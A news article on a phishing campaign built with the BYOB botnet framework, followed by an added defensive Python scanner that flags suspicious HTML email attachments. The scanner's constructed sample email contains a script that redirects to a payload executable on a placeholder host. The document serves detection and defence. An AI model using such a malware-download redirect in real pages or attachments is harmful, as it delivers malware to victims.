An attack leveraging the open-source Build Your Own Botnet (BYOB) framework has reportedly been intercepted by Israeli cybersecurity firm Perception Point’s incident response team. According to the team, this appears to be the first time the BYOB framework has been found to be used for fraudulent activity in the wild.
While these tactics and techniques have historically been limited in use to financially backed advanced persistent threat (APT) groups, they are now more easily accessible to novice criminals, in part because of the growing popularity of plug-and-play hacking kits, researchers said.
In July, the BYOB framework, which implements all the building blocks needed to construct a botnet, was released to help improve cybersecurity defenses; however, a tool built for defense can also fall into the hands of those with more malicious intentions. The continued growth of such hacking kits lets any script kiddie or malicious attacker leverage the framework to carry out attacks that otherwise wouldn’t be possible for them.
According to the team’s email analysis, victims received an email with an HTML attachment containing both a link to a phishing site impersonating the Office 365 login page and script code that automatically downloaded malware to the victim’s computer. After connecting to the attacker’s server, the payload waits for commands.
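As an added illustration, not part of the report and not Perception Point’s tooling, the following Python scanner flags HTML email attachments that combine a login-style link with embedded script, the pairing described above; the sample message, domains and keyword heuristics are constructed for the example.

```python
import email
from email import policy
from html.parser import HTMLParser

# Constructed sample (not the message from the reported attack): an HTML attachment
# that pairs an Office 365 style login link with a script fetching a second-stage file.
SAMPLE_EML = """From: sender@example.invalid
To: victim@example.invalid
Subject: Document shared with you
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html; name="document.html"
Content-Disposition: attachment; filename="document.html"

<html><body>
<a href="http://office365-login.example.invalid/auth">Sign in to Office 365</a>
<script>window.location="http://dl.example.invalid/payload.exe";</script>
</body></html>
--b1--
"""

class _Collector(HTMLParser):
    """Collect anchor targets and count <script> elements."""
    def __init__(self):
        super().__init__()
        self.links, self.script_count = [], 0
    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.links += [v for k, v in attrs if k == "href" and v]
        elif tag == "script":
            self.script_count += 1

LURE_WORDS = ("office365", "office-365", "microsoft", "login", "signin")  # assumed heuristics

def analyze_html_attachment(html):
    """Flag an attachment that combines a login-style link with active script."""
    c = _Collector()
    c.feed(html)
    lure = [u for u in c.links if any(w in u.lower() for w in LURE_WORDS)]
    return {"scripts": c.script_count, "links": c.links, "lure_links": lure,
            "suspicious": c.script_count > 0 and bool(lure)}

def scan_eml(raw):
    """Return findings for every text/html attachment in an RFC 5322 message."""
    msg = email.message_from_string(raw, policy=policy.default)
    return {part.get_filename() or "<unnamed>": analyze_html_attachment(part.get_content())
            for part in msg.iter_attachments() if part.get_content_type() == "text/html"}
```

A mail gateway rule built on this would quarantine or rewrite such attachments rather than relying on the user noticing the fake login page.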
“The attack we intercepted was a targeted email attack against one of our clients. It was distributed via the email channel so the extent of it is to whomever the attacker chose to send it to. The nature of the tool [BYOB] used in the attack is mass remote control; therefore, we presume that this wasn't a single email sent, and we expect that others might have been compromised by this attack as well,” said Shlomi Levin, co-founder and CTO, Perception Point.
“The attack was easily prepared using the BYOB framework; hence, it doesn't cost the attacker much investment, so I would expect to see more BYOB used in the future.”